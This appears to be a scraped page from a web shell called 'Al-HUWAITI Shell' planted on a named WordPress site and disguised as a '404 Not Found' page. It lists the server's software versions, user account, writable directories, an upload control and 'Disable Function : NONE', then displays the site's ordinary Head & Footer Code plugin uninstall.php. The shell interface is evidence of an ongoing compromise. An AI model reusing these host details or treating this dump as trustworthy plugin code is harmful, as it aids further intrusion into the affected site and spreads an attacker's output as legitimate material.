hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/www.obusignal.com/www.obusignal.com/wp-content/plugins/head-footer-code/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/www.obusignal.com/www.obusignal.com/wp-content/plugins/head-footer-code/uninstall.php
<?php
/**
 * Routine to fully uninstall Head & Footer Code plugin.
 *
 * @link        https://urosevic.net
 * @link        https://www.techwebux.com
 * @since       1.0.5
 * @package     Head_Footer_Code
 */

// If this file is called directly, abort.
if ( ! defined( 'WPINC' ) ) {
	die;
}

// If uninstall is not called from WordPress, exit.
if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) {
	exit();
}

$auhfc_options = array(
	'auhfc_settings',
	'auhfc_settings_sitewide',
	'auhfc_settings_homepage',
	'auhfc_settings_article',
	'auhfc_db_ver',
);
foreach ( $auhfc_options as $option_name ) {
	// Delete option on single site.
	delete_option( $option_name );
}

// Delete post meta values.
$post_meta_key = '_auhfc';
delete_post_meta_by_key( $post_meta_key );

// Delete category meta values.
$category_meta_key  = '_auhfc';
$auhfc_category_ids = get_terms(
	array(
		'taxonomy' => 'category',
		'fields'   => 'ids',
		'meta_key' => $category_meta_key,
	)
);
foreach ( $auhfc_category_ids as $category_id ) {
	delete_term_meta( $category_id, $category_meta_key );
}

Al-HUWAITI Shell